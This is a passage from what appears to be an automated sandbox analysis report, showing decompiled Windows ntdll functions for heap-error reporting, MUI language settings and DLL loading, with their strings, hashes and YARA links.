							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0173B150();
				} else {
					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0173B150("Error code: %d - %s\n",  *0x1825898);
				_t113 =  *0x18258a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0173B150();
					} else {
						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0173B150("Parameter1: %p\n",  *0x18258a4);
				}
				_t115 =  *0x18258a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0173B150();
					} else {
						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0173B150("Parameter2: %p\n",  *0x18258a8);
				}
				_t117 =  *0x18258ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0173B150();
					} else {
						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0173B150("Parameter3: %p\n",  *0x18258ac);
				}
				_t119 =  *0x18258b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0173B150();
					} else {
						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x18258b4);
					E0173B150("Last known valid blocks: before - %p, after - %p\n",  *0x18258b0);
				} else {
					_t120 =  *0x18258b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0173B150();
				} else {
					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0173B150("Stack trace available at %p\n", 0x18258c0);
			}











                                                                    0x017f1c10
                                                                    0x017f1c16
                                                                    0x017f1c1e
                                                                    0x017f1c3d
                                                                    0x017f1c3e
                                                                    0x017f1c20
                                                                    0x017f1c35
                                                                    0x017f1c3a
                                                                    0x017f1c44
                                                                    0x017f1c55
                                                                    0x017f1c5a
                                                                    0x017f1c65
                                                                    0x017f1c67
                                                                    0x00000000
                                                                    0x017f1c6e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x017f1c67
                                                                    0x017f1cdc
                                                                    0x017f1ce5
                                                                    0x017f1d04
                                                                    0x017f1d05
                                                                    0x017f1ce7
                                                                    0x017f1cfc
                                                                    0x017f1d01
                                                                    0x017f1d0b
                                                                    0x017f1d17
                                                                    0x017f1d1f
                                                                    0x017f1d25
                                                                    0x017f1d30
                                                                    0x017f1d4f
                                                                    0x017f1d50
                                                                    0x017f1d32
                                                                    0x017f1d47
                                                                    0x017f1d4c
                                                                    0x017f1d61
                                                                    0x017f1d67
                                                                    0x017f1d68
                                                                    0x017f1d6e
                                                                    0x017f1d79
                                                                    0x017f1d98
                                                                    0x017f1d99
                                                                    0x017f1d7b
                                                                    0x017f1d90
                                                                    0x017f1d95
                                                                    0x017f1daa
                                                                    0x017f1db0
                                                                    0x017f1db1
                                                                    0x017f1db7
                                                                    0x017f1dc2
                                                                    0x017f1de1
                                                                    0x017f1de2
                                                                    0x017f1dc4
                                                                    0x017f1dd9
                                                                    0x017f1dde
                                                                    0x017f1df3
                                                                    0x017f1df9
                                                                    0x017f1dfa
                                                                    0x017f1e00
                                                                    0x017f1e0a
                                                                    0x017f1e13
                                                                    0x017f1e32
                                                                    0x017f1e33
                                                                    0x017f1e15
                                                                    0x017f1e2a
                                                                    0x017f1e2f
                                                                    0x017f1e39
                                                                    0x017f1e4a
                                                                    0x017f1e02
                                                                    0x017f1e02
                                                                    0x017f1e08
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x017f1e08
                                                                    0x017f1e5b
                                                                    0x017f1e7a
                                                                    0x017f1e7b
                                                                    0x017f1e5d
                                                                    0x017f1e72
                                                                    0x017f1e77
                                                                    0x017f1e95

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                    • API String ID: 0-2897834094
                                                                    • Opcode ID: d44620f31007172ead41c45aaaf57e7be9c68bb6f01141b018e0e4cab8a43839
                                                                    • Instruction ID: 5757da4b58ecb61db55a2815a4b5d42cc65b3a056331bd264293c403ad5461a6
                                                                    • Opcode Fuzzy Hash: d44620f31007172ead41c45aaaf57e7be9c68bb6f01141b018e0e4cab8a43839
                                                                    • Instruction Fuzzy Hash: 6F61D473554155DFD221AB8DD498E36F3A4EB04A30F4980BFFB095B345DAB49982CF0A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01743D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E01743D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01741B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01741B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01741B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01741B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01741B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01754620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0177F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01781370(_t276, 0x1714e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0177BB40(0,  &_v68, _t170);
									if(L017443C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0177BB40(_t257,  &_v68, _t243);
								if(L017443C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01781370(_t278, 0x1714e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01754620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0177F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01781370(_v16, 0x1714e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0177BB40(_t262,  &_v68, _t244);
								if(L017443C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01781370(_t282, 0x1714e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0177BB40(_t262,  &_v68, _t201);
							if(L017443C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01754620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0177F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01781370(_t280, 0x1714e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0177BB40(_t267,  &_v68, _t245);
							if(L017443C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01781370(_t284, 0x1714e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0177BB40(_t267,  &_v68, _t224);
						if(L017443C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                    0x01743d3c
                                                                    0x01743d42
                                                                    0x01743d44
                                                                    0x01743d46
                                                                    0x01743d49
                                                                    0x01743d4c
                                                                    0x01743d4f
                                                                    0x01743d52
                                                                    0x01743d55
                                                                    0x01743d58
                                                                    0x01743d5b
                                                                    0x01743d5f
                                                                    0x01743d61
                                                                    0x01743d66
                                                                    0x01798213
                                                                    0x01798218
                                                                    0x01744085
                                                                    0x01744088
                                                                    0x0174408e
                                                                    0x01744094
                                                                    0x0174409a
                                                                    0x017440a0
                                                                    0x017440a6
                                                                    0x017440a9
                                                                    0x017440af
                                                                    0x017440b6
                                                                    0x017440bd
                                                                    0x017440bd
                                                                    0x01743d83
                                                                    0x0179821f
                                                                    0x01798229
                                                                    0x01798238
                                                                    0x01798238
                                                                    0x0179823d
                                                                    0x0179823d
                                                                    0x01743da0
                                                                    0x01743daf
                                                                    0x01743db5
                                                                    0x01743dba
                                                                    0x01743dba
                                                                    0x01743dd4
                                                                    0x01743e94
                                                                    0x01743eab
                                                                    0x01743f6d
                                                                    0x01743f84
                                                                    0x0174406b
                                                                    0x0174406b
                                                                    0x0174406e
                                                                    0x0174406e
                                                                    0x01744070
                                                                    0x01744074
                                                                    0x01798351
                                                                    0x01798351
                                                                    0x0174407a
                                                                    0x0174407f
                                                                    0x0179835d
                                                                    0x01798370
                                                                    0x01798377
                                                                    0x01798379
                                                                    0x0179837c
                                                                    0x0179837c
                                                                    0x0179835d
                                                                    0x00000000
                                                                    0x0174407f
                                                                    0x01743f8a
                                                                    0x01743f8d
                                                                    0x01743f90
                                                                    0x01743f95
                                                                    0x0179830d
                                                                    0x0179830f
                                                                    0x01743f9b
                                                                    0x01743fac
                                                                    0x01743fae
                                                                    0x01743fb1
                                                                    0x01743fb1
                                                                    0x01743fb6
                                                                    0x01798317
                                                                    0x0179831a
                                                                    0x00000000
                                                                    0x01743fbc
                                                                    0x01743fc1
                                                                    0x01743fc9
                                                                    0x01743fd7
                                                                    0x01743fda
                                                                    0x01743fdd
                                                                    0x01744021
                                                                    0x01744021
                                                                    0x01744029
                                                                    0x01744030
                                                                    0x01744044
                                                                    0x01744046
                                                                    0x01744046
                                                                    0x01744044
                                                                    0x01744049
                                                                    0x01798327
                                                                    0x01798334
                                                                    0x01798339
                                                                    0x0179833c
                                                                    0x0174404f
                                                                    0x0174404f
                                                                    0x0174404f
                                                                    0x01744051
                                                                    0x01744056
                                                                    0x01744063
                                                                    0x01744063
                                                                    0x01744068
                                                                    0x00000000
                                                                    0x01744068
                                                                    0x01743fdf
                                                                    0x01743fe2
                                                                    0x01743fe4
                                                                    0x01743fe7
                                                                    0x01743fef
                                                                    0x01744003
                                                                    0x01744005
                                                                    0x01744005
                                                                    0x0174400c
                                                                    0x01744013
                                                                    0x01744016
                                                                    0x01744017
                                                                    0x0174401b
                                                                    0x0174401e
                                                                    0x00000000
                                                                    0x0174401e
                                                                    0x01743fb6
                                                                    0x01743eb1
                                                                    0x01743eb4
                                                                    0x01743eb7
                                                                    0x01743ebc
                                                                    0x017982a9
                                                                    0x017982ab
                                                                    0x01743ec2
                                                                    0x01743ed3
                                                                    0x01743ed5
                                                                    0x01743ed8
                                                                    0x01743ed8
                                                                    0x01743edd
                                                                    0x017982b3
                                                                    0x017982b6
                                                                    0x00000000
                                                                    0x01743ee3
                                                                    0x01743ee8
                                                                    0x01743eed
                                                                    0x01743ef0
                                                                    0x01743ef3
                                                                    0x01743f02
                                                                    0x01743f05
                                                                    0x01743f08
                                                                    0x017982c0
                                                                    0x017982c3
                                                                    0x017982c5
                                                                    0x017982c8
                                                                    0x017982d0
                                                                    0x017982e4
                                                                    0x017982e6
                                                                    0x017982e6
                                                                    0x017982ed
                                                                    0x017982f4
                                                                    0x017982f7
                                                                    0x017982f8
                                                                    0x017982fc
                                                                    0x017982ff
                                                                    0x017982ff
                                                                    0x01743f0e
                                                                    0x01743f11
                                                                    0x01743f16
                                                                    0x01743f1d
                                                                    0x01743f31
                                                                    0x01798307
                                                                    0x01798307
                                                                    0x01743f31
                                                                    0x01743f39
                                                                    0x01743f48
                                                                    0x01743f4d
                                                                    0x01743f50
                                                                    0x01743f50
                                                                    0x01743f53
                                                                    0x01743f58
                                                                    0x01743f65
                                                                    0x01743f65
                                                                    0x01743f6a
                                                                    0x00000000
                                                                    0x01743f6a
                                                                    0x01743edd
                                                                    0x01743dda
                                                                    0x01743ddd
                                                                    0x01743de0
                                                                    0x01743de5
                                                                    0x01798245
                                                                    0x01743deb
                                                                    0x01743df7
                                                                    0x01743dfc
                                                                    0x01743dfe
                                                                    0x01743e01
                                                                    0x01743e01
                                                                    0x01743e06
                                                                    0x0179824d
                                                                    0x0179824f
                                                                    0x01798254
                                                                    0x00000000
                                                                    0x01743e0c
                                                                    0x01743e11
                                                                    0x01743e16
                                                                    0x01743e19
                                                                    0x01743e29
                                                                    0x01743e2c
                                                                    0x01743e2f
                                                                    0x0179825c
                                                                    0x0179825f
                                                                    0x01798261
                                                                    0x01798264
                                                                    0x0179826c
                                                                    0x01798280
                                                                    0x01798282
                                                                    0x01798282
                                                                    0x01798289
                                                                    0x01798290
                                                                    0x01798293
                                                                    0x01798294
                                                                    0x01798298
                                                                    0x0179829b
                                                                    0x0179829b
                                                                    0x01743e35
                                                                    0x01743e38
                                                                    0x01743e3d
                                                                    0x01743e44
                                                                    0x01743e58
                                                                    0x017982a3
                                                                    0x017982a3
                                                                    0x01743e58
                                                                    0x01743e60
                                                                    0x01743e6f
                                                                    0x01743e74
                                                                    0x01743e77
                                                                    0x01743e77
                                                                    0x01743e7a
                                                                    0x01743e7f
                                                                    0x01743e8c
                                                                    0x01743e8c
                                                                    0x01743e91
                                                                    0x00000000
                                                                    0x01743e91

                                                                    Strings
                                                                    • Kernel-MUI-Language-SKU, xrefs: 01743F70
                                                                    • WindowsExcludedProcs, xrefs: 01743D6F
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 01743DC0
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 01743D8C
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 01743E97
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 0-258546922
                                                                    • Opcode ID: c9237cda180747c03c2569e7a721f07b48d36f333c8f1302087928c9ecc04a2d
                                                                    • Instruction ID: d1f31bb76dbe9834f44f0f0df657eadcf852884b31d85cb3cb7b7d78ab7f2805
                                                                    • Opcode Fuzzy Hash: c9237cda180747c03c2569e7a721f07b48d36f333c8f1302087928c9ecc04a2d
                                                                    • Instruction Fuzzy Hash: 27F15E72D00619EFCF11DF98D984AEEFBB9FF09650F1400AAE906A7214D7749E05CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017340E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 29%
                                                                    			E017340E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0173B150();
					} else {
						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0173B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0173B150(", passed to %s", _t29);
					}
					_push("\n");
					E0173B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1826378 = 1;
						asm("int3");
						 *0x1826378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                    0x017340e6
                                                                    0x017340e8
                                                                    0x017340f1
                                                                    0x0179042d
                                                                    0x0179044c
                                                                    0x01790451
                                                                    0x0179042f
                                                                    0x01790444
                                                                    0x01790449
                                                                    0x0179045d
                                                                    0x01790466
                                                                    0x0179046e
                                                                    0x01790474
                                                                    0x01790475
                                                                    0x0179047a
                                                                    0x0179048a
                                                                    0x0179048c
                                                                    0x01790493
                                                                    0x01790494
                                                                    0x01790494
                                                                    0x00000000
                                                                    0x0179049b
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                    • API String ID: 0-188067316
                                                                    • Opcode ID: 1ded857ed9d0d3c3003a863db4f388c941dc894f0210aca9ac1590e99d7ea439
                                                                    • Instruction ID: abf66e9ac807fad8d6d4072524a54b4c26c87520e1d27e2c3dceddfe16d55c58
                                                                    • Opcode Fuzzy Hash: 1ded857ed9d0d3c3003a863db4f388c941dc894f0210aca9ac1590e99d7ea439
                                                                    • Instruction Fuzzy Hash: 12014C72111241AFD33A9B6DF45DF56F7A8DB81F30F28806FF00547656CAE49444C610
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01768E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpFindDllActivationContext, xrefs: 017A9331, 017A935D
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 017A933B, 017A9367
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 017A932A
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 017A9357
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 0-3779518884
                                                                    • Opcode ID: 5f8891bf47c438414a62b3ab9d55c0bb3b43b39dd266139ffba936daa1f453e7
                                                                    • Instruction ID: 569cd1dccdbae871dfc61c2d20a524ebe1d84ff77db44c6a2a7d0596e84b62d4
                                                                    • Opcode Fuzzy Hash: 5f8891bf47c438414a62b3ab9d55c0bb3b43b39dd266139ffba936daa1f453e7
                                                                    • Instruction Fuzzy Hash: 5E412872A403119FEF32AB1CCC8DA75F6BDAB49304F098269EE0457155E7709D80C783
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017F49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                    • API String ID: 2994545307-336120773
                                                                    • Opcode ID: 24af9a584fcf4465a31363251a244ed682f8db9a4074eec18387d0d5adc79be3
                                                                    • Instruction ID: 1ad4c9ac65d2864e93bee317f66e9ec9cc2509fac32fe1d81aa3343708e1e264
                                                                    • Opcode Fuzzy Hash: 24af9a584fcf4465a31363251a244ed682f8db9a4074eec18387d0d5adc79be3
                                                                    • Instruction Fuzzy Hash: 70311476200110EFD721DF6DC889F6BF7E8EF04624F14419EF6068B355E674AA48CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01748794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpDoPostSnapWork, xrefs: 01799C1E
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01799C28
                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01799C18
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 2994545307-1948996284
                                                                    • Opcode ID: 5b155dee4ac2f104d29776e4136ebdcee34e9003141de33132211d05d55104c5
                                                                    • Instruction ID: f83cad0f77f1e1acfac815fb1c367fb941cf098021bba74f931b628fc1658918
                                                                    • Opcode Fuzzy Hash: 5b155dee4ac2f104d29776e4136ebdcee34e9003141de33132211d05d55104c5
                                                                    • Instruction Fuzzy Hash: F7911771A0021ADFEF29DF9DD8809BAF7B9FF45314B054169EA05AB245D730EE01CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01747E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpCompleteMapModule, xrefs: 01799898
                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 01799891
                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 017998A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                    • API String ID: 0-1676968949
                                                                    • Opcode ID: 45988d96e78120fda15e52932e13ccaa5cee8d6b55984b256204a8a559ef48ee
                                                                    • Instruction ID: d6eb9ba34fec9a99016bf9d9874609c7bce81d4c8cf3171309d0c1f74906b6fe
                                                                    • Opcode Fuzzy Hash: 45988d96e78120fda15e52932e13ccaa5cee8d6b55984b256204a8a559ef48ee
                                                                    • Instruction Fuzzy Hash: 8951F031600742DFEB3ACB6CC984B6AFBE4AB48314F040699EA519B7D1D770ED01CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0173E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • @, xrefs: 0173E6C0
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0173E68C
                                                                    • InstallLanguageFallback, xrefs: 0173E6DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
